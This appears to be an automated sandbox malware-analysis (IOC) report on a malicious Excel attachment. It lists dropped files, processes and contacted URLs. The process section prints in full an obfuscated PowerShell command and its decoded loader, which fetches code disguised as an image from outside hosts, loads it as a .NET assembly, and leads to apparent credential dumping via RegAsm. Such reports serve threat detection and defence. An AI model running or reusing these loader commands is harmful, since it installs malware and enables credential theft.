IOC Report
INQUIRY#46789.xla.xlsx

loading gif

Files

File Path
Type
Category
Malicious
INQUIRY#46789.xla.xlsx
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 2 01:50:46 2024, Security: 1
initial sample
 malicious
C:\ProgramData\sabelianos.vbs
ASCII text, with very long lines (332), with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\beautifulroseipictureiseenitsshowingasabeautifulflowerwhichcomingfromtheworldanditsshowinghowbeautiful___sheiswhenthatroseonhairbeautiful[1].doc
Rich Text Format data, version 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulrosepictureforcuple[1].gif
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49740FD3.doc
Rich Text Format data, version 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{22E766A3-CA3D-4B6F-BED5-FF71E53845DC}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\D1ae4.url
MS Windows 95 Internet shortcut text (URL=<http://pop.tg/D1ae4>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pop.tg.url
MS Windows 95 Internet shortcut text (URL=<http://pop.tg/>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\beautifulpictureforcouples.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0FQ71[1].txt
Unicode text, UTF-8 text, with very long lines (11123), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1BA77CFB.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\567D1BC1.png
PNG image data, 1008 x 529, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{96D5CE2F-741B-4459-8FED-5B97D7B99866}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A12D8FD0-A2E8-438E-A072-D56BD5AEDC36}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bhv497F.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x13850101, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhv65C6.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x13850101, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\cc4gbaud.rdp.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\chp31FB.tmp
SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 11, database pages 51, cookie 0x5a, schema 4, UTF-8, version-valid-for 11
dropped
C:\Users\user\AppData\Local\Temp\chp32A7.tmp
SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 4, database pages 23, cookie 0x23, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\chp43D6.tmp
SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 4, database pages 23, cookie 0x23, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\chp6F39.tmp
SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 11, database pages 51, cookie 0x5a, schema 4, UTF-8, version-valid-for 11
dropped
C:\Users\user\AppData\Local\Temp\huqveuwntqlrmlybthcenbzzriklfmudg
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\jcpa
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\kctjqlmq.3fk.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\margyzjp.0sc.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xsm1jwte.inm.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{10B9ABDC-CE7E-41CF-969B-26C67612155B}
data
dropped
C:\Users\user\AppData\Local\Temp\{D7E0E658-005E-4F3B-88E5-9F5B9EFB0C46}
data
dropped
C:\Users\user\AppData\Local\Temp\~DF4CBB480485CC8500.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$INQUIRY#46789.xla.xlsx
data
dropped
Chrome Cache Entry: 169
ASCII text, with very long lines (775)
downloaded
\Device\Mup\LTKMYBS*\MAILSLOT\NET\NETLOGON
data
dropped
There are 28 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\beautifulpictureforcouples.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRgBGDgTreEIDgTreSwDgTrevDgTreDDgTreDgTreMgDgTrewDgTreDkDgTreLwDgTre2DgTreDkDgTreLgDgTreyDgTreDQDgTreMgDgTreuDgTreDUDgTreNwDgTrexDgTreC4DgTreNwDgTrewDgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreHMDgTreYQBiDgTreGUDgTrebDgTreBpDgTreGEDgTrebgBvDgTreHMDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FFBK/0209/69.242.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'sabelianos','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\sabelianos.vbs"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\huqveuwntqlrmlybthcenbzzriklfmudg"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rwdne"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\briyfxzid"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\sabelianos.vbs"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jcpa"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twutehs"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wyzefsckuj"
 malicious
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1312 --field-trial-handle=1164,i,12295788173595172978,5315075123005719965,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1320,i,11995020747881027354,7636769829744668384,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1312,i,12721759368113981321,9650863181706294674,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1312,i,8048391771101427258,3488663973075303133,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(s)/
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1416 --field-trial-handle=1212,i,15387615927566497572,6828730572207653402,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1356 --field-trial-handle=1136,i,61898105425524230,6329090133456978348,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=1372,i,7040727732145984363,3593676648702084306,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(s)/
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=1404,i,17451326606051937967,12013872481303463395,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1328,i,9707891231919903179,15563385993840059589,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
There are 23 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://geoplugin.net/json.gp/C
unknown
 malicious
http://107.175.242.96/9020/KBFF.txt
107.175.242.96
 malicious
